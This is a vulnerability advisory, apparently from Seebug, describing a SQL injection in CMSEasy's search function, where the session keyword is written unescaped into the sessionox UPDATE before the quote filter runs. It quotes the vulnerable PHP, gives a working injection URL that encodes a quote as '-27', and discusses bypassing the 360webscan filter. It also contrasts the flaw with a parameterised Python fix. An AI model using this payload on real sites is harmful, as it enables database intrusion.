### Brief description:
Unfortunately 360webscan was not bypassed (actually it is easily bypassed).
### Detailed description:
The latest version of cmseasy (0318) contains an injection.
Vulnerable file: /lib/default/archive_act.php
Lines 250-251:
```php
function search_action() {//print_r($_SESSION);exit();
    if (front::get('ule')) {
        front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']);
        front::$get['keyword'] = urldecode(front::$get['keyword']);
    }
    if (front::get('keyword') && !front::post('keyword'))
        front::$post['keyword'] = front::get('keyword');
    front::check_type(front::post('keyword'), 'safe');
    if (front::post('keyword')) {
        $this->view->keyword = trim(front::post('keyword'));
        // the keyword is written to the session (and thus the database) here
        session::set('keyword', trim(front::post('keyword')));
        /* if(isset(front::$get['keyword']))
            front::redirect(preg_replace('/keyword=[^&]+/','keyword='.urlencode($this->view->keyword),front::$uri));
        else front::redirect(front::$uri.'&keyword='.urlencode($this->view->keyword)); */
    } else {
        $this->view->keyword = session::get('keyword');
    }
    // the quote/union filter only runs after the session write above
    if(preg_match('/union/i',$this->view->keyword) || preg_match('/"/i',$this->view->keyword) ||preg_match('/\'/i',$this->view->keyword)){
        exit('非法参数'); // "illegal parameter"
    }
    // ... (excerpt; the function continues)
```
Key code:
```php
if (front::get('ule')) {
    front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']);
    front::$get['keyword'] = urldecode(front::$get['keyword']);
}
```
As long as the `ule` GET parameter is present, this branch is entered: `-` is replaced with `%` and the result is then urldecoded, so a `'` can be introduced directly by passing `-27`.
Next, look at:
```php
session::set('keyword', trim(front::post('keyword')));
```
Corresponding function code:
```php
class session {
    static function get($key) {
        if (isset($_SESSION[$key]))
            return $_SESSION[$key];
        else
            return false;
    }
    static function set($key,$var) {
        $_SESSION[$key]=$var;
    }
    static function del($key) {
        unset($_SESSION[$key]);
    }
}
//session_start();
```
After cmseasy assigns a session value, a write operation is performed:
/lib/plugins/stsession.php
```php
public function write($id,$data) {
    $sql = "SELECT * FROM {$this->_prefix}sessionox where PHPSESSID = '$id'";
    //var_dump($sql);
    $res = $this->_db->query($sql);
    $time = time();
    $row = $this->_db->fetch_array($res);
    if ($row) {
        //if ($row['data'] != $data) {
        // $data (the serialized session, containing the keyword) is interpolated unescaped
        $sql = "UPDATE {$this->_prefix}sessionox SET update_time='$time',data='$data' WHERE PHPSESSID = '$id'";
        $this->_db->query($sql);
        //}
    } else {
        if (!empty($data)) {
            $sql = "INSERT INTO {$this->_prefix}sessionox (PHPSESSID, update_time, client_ip, data) VALUES ('$id','$time','$this->_ip','$data')";
            $this->_db->query($sql);
        }
    }
    return true;
}
```
The `$data` value goes into the UPDATE statement, causing the injection.
The subsequent preg_match check on the parameter runs only after the database operation, so it has no effect:
```php
if(preg_match('/union/i',$this->view->keyword) || preg_match('/"/i',$this->view->keyword) ||preg_match('/\'/i',$this->view->keyword)){
    exit('非法参数');
}
```
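To make the ordering problem and the fix concrete, here is an added Python illustration (not CMSEasy's code): it re-creates the `ule` decoding step, the late filter and the session UPDATE, and contrasts the concatenating write with a parameterised one in which validation precedes persistence. The table prefix `ce_`, the session id and the client IP are constructed values, and SQLite stands in for the real database.

```python
import sqlite3
from urllib.parse import unquote

# Hypothetical re-creation of the archive_act.php / stsession.php flow.

def decode_keyword(raw: str, ule: bool) -> str:
    """Mirror of the ule branch: '-' -> '%' then urldecode."""
    return unquote(raw.replace("-", "%")) if ule else raw

def keyword_is_rejected(keyword: str) -> bool:
    """Mirror of the preg_match filter: union, double or single quote."""
    return ("union" in keyword.lower()) or ('"' in keyword) or ("'" in keyword)

def build_update_unsafe(prefix: str, sid: str, ts: int, data: str) -> str:
    """Mirror of stsession.php: $data interpolated straight into the SQL."""
    return (f"UPDATE {prefix}sessionox SET update_time='{ts}',data='{data}' "
            f"WHERE PHPSESSID = '{sid}'")

def write_session_safe(conn: sqlite3.Connection, prefix: str,
                       sid: str, ts: int, data: str) -> None:
    """Hardened write (assumption): the value is bound, never concatenated.
    The table prefix is trusted configuration, not user input."""
    conn.execute(f"UPDATE {prefix}sessionox SET update_time=?, data=? "
                 f"WHERE PHPSESSID=?", (ts, data, sid))

def make_store(prefix: str, sid: str, ip: str) -> sqlite3.Connection:
    """Constructed in-memory stand-in for the sessionox table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {prefix}sessionox (PHPSESSID TEXT, "
                 f"update_time INTEGER, client_ip TEXT, data TEXT)")
    conn.execute(f"INSERT INTO {prefix}sessionox VALUES (?,?,?,?)",
                 (sid, 0, ip, ""))
    return conn

def handle_search(conn, prefix, sid, raw_keyword, ule, ts=1000):
    """Corrected order: decode, validate, and only then persist to the
    session store. Returns the stored (data, client_ip) or None if rejected."""
    keyword = decode_keyword(raw_keyword, ule).strip()
    if keyword_is_rejected(keyword):
        return None
    write_session_safe(conn, prefix, sid, ts, keyword)
    return conn.execute(f"SELECT data, client_ip FROM {prefix}sessionox "
                        f"WHERE PHPSESSID=?", (sid,)).fetchone()
```

Note that `build_update_unsafe` only shows the string the original code would send; the bound version stores a quote-bearing keyword as plain data without touching any other column.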
The interception whitelist has also been changed, and I cannot think of a way to bypass 360webscan:
```php
/**
 * Intercept directory whitelist
 */
function webscan_white($webscan_white_name,$webscan_white_url=array()) {
    $url_path=$_SERVER['SCRIPT_NAME'];
    foreach($_GET as $key=>$value){
        $url_var.=$key."=".$value."&"; // note: $url_var is never initialised before use
    }
    if (preg_match("/".$webscan_white_name."/is",$url_path)==1&&!empty($webscan_white_name)) {
        return false;
    }
    foreach ($webscan_white_url as $key => $value) {
        if(!empty($url_var)&&!empty($value)){
            if (stristr($url_path,$key)&&stristr($url_var,$value)) {
                return false;
            }
        }
        elseif (empty($url_var)&&empty($value)) {
            if (stristr($url_path,$key)) {
                return false;
            }
        }
    }
    return true;
}
```
### Proof of vulnerability:
Proof that the injection exists:
http://127.0.0.1/cmseasy/index.php?case=archive&act=search&keyword=-27,client_ip=user()-23&ule=1
[![1.jpg](https://images.seebug.org/upload/201504/201508559cba4700c3cd613fd71cf2c945e1f285.jpg)](https://images.seebug.org/upload/201504/201508559cba4700c3cd613fd71cf2c945e1f285.jpg)
[![2.png](https://images.seebug.org/upload/201504/20150909e74c6ad6eafdaf3c57235dbf9a009514.png)](https://images.seebug.org/upload/201504/20150909e74c6ad6eafdaf3c57235dbf9a009514.png)
Once 360webscan is bypassed, blind injection can be performed directly.